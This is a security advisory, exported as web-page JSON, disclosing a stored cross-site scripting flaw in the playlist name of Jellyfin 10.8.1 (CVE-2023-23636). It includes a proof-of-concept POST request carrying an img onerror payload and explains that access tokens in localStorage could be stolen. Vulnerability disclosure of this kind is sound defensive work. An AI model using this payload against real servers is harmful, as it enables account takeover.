{"id":19346,"date":"2023-01-01T16:00:00","date_gmt":"2023-01-01T15:00:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19346"},"modified":"2023-11-29T13:18:34","modified_gmt":"2023-11-29T12:18:34","slug":"usd-2022-0030","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0030\/","title":{"rendered":"usd-2022-0030"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0030 | Jellyfin 10.8.1 - Cross-Site Scripting<\/h1>\n

Advisory ID:<\/strong> usd-2022-0030
\nProduct:<\/strong> Jellyfin
\nAffected Version:<\/strong> 10.8.1
\nVulnerability Type:<\/strong> Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (<\/span>CWE-79)
\nSecurity Risk:<\/strong> CRITICAL
\nVendor URL:<\/strong> https:\/\/jellyfin.org<\/a>
\nVendor acknowledged vulnerability:<\/strong> Yes
\nVendor Status:<\/strong> Fixed
\nCVE Number:<\/strong> CVE-2023-23636
\nCVE Link:<\/strong> https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-23636<\/a><\/p>\n

Description<\/h2>\n

The playlist name in Jellyfin 10.8.1 is vulnerable to a stored XSS which allows a low privileged user to steal access tokens from high privileged users.
\nThe injected code is triggered everytime a user visits the playlist page. Since access tokens are stored in the localStorage<\/strong> an attacker is able to take over accounts by reading their values.<\/p>\n

Proof of Concept<\/h2>\n

The following screenshot shows the executed JavaScript payload in the victim's browser.<\/p>\n

\"\"<\/p>\n

The following request creates a payload with injected name<\/em>.<\/p>\n

\n
<\/span>POST<\/span> \/Playlists?Name=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&Ids=0358e400bf19a370e7f2e4e69f2af64d&userId=e9239683c3384717810a900f1c2c7eb5<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8096<\/span>\nContent-Length<\/span>:<\/span> 0<\/span>\nsec-ch-ua<\/span>:<\/span> \"Chromium\";v=\"97\", \" Not;A Brand\";v=\"99\"<\/span>\naccept<\/span>:<\/span> application\/json<\/span>\nContent-Type<\/span>:<\/span> application\/json<\/span>\n[...]<\/span><\/pre>\n<\/div>\n
Fix<\/h2>\n
It is recommended to treat all input on the website as potentially dangerous.
\nHence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.
\nThe majority of programming languages support standard procedures for encoding meta characters.<\/p>\n
References<\/h2>\n